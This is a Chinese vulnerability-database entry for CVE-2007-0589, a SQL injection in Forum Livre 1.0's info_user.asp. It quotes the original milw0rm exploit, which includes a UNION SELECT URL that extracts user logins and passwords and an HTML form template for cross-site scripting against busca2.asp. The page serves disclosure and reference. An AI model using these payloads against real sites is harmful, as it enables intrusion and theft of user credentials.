Forum Livre 'info_user.asp'SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112080 漏洞类型 SQL注入
发布时间 2007-01-25 更新时间 2007-01-30
CVE编号 CVE-2007-0589 CNNVD-ID CNNVD-200701-549
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3197
https://www.securityfocus.com/bid/81990
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-549
|漏洞详情
ForumLivre1.0版本中存在SQL注入漏洞。远程攻击者可以借助对info_user.asp的用户参数,执行任意SQL指令。
|漏洞EXP
*******************************************************************************
# Title   :  Forum Livre 1.0 Multiple Remote Vulnerabilities
# Author  :  ajann
# Contact :  :(
# $$      :  Free

*******************************************************************************

[[SQL]]]---------------------------------------------------------

Login Before..->

http://[target]/[path]//info_user.asp?user=[SQL]

Example:

//info_user.asp?user=-1'union%20select%200,0,0,loginu,senhau,0,0,0,0,0,0%20from%20tusuario

[[/SQL]]

[[XSS]]]---------------------------------------------------------

Login Before..->

http://[target]/[path]//busca2.asp (POST Method) [SQL]

Example:

<form method="POST" action="http://[TARGET]/[path]/busca2.asp">
<input type="text" name="palavra" value="[#]XSS HERE[#]">
<input type="radio" value="all" name="tipo" checked>
<input type="radio" value="some" name="tipo">
<select size="1" name="forum">
<option value="">Todos os fóruns</option>
<option value="">Fórum ComCatz</option>
<input type="submit" value="Investigar" name="B1">
</form>

[[/XSS]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-25]
|受影响的产品
Forum Livre Forum Livre 1.0
|参考资料

来源:MILW0RM
名称:3197
链接:http://www.milw0rm.com/exploits/3197
来源:OSVDB
名称:36644
链接:http://osvdb.org/36644
来源:MILW0RM
名称:3197
链接:http://milw0rm.com/exploits/3197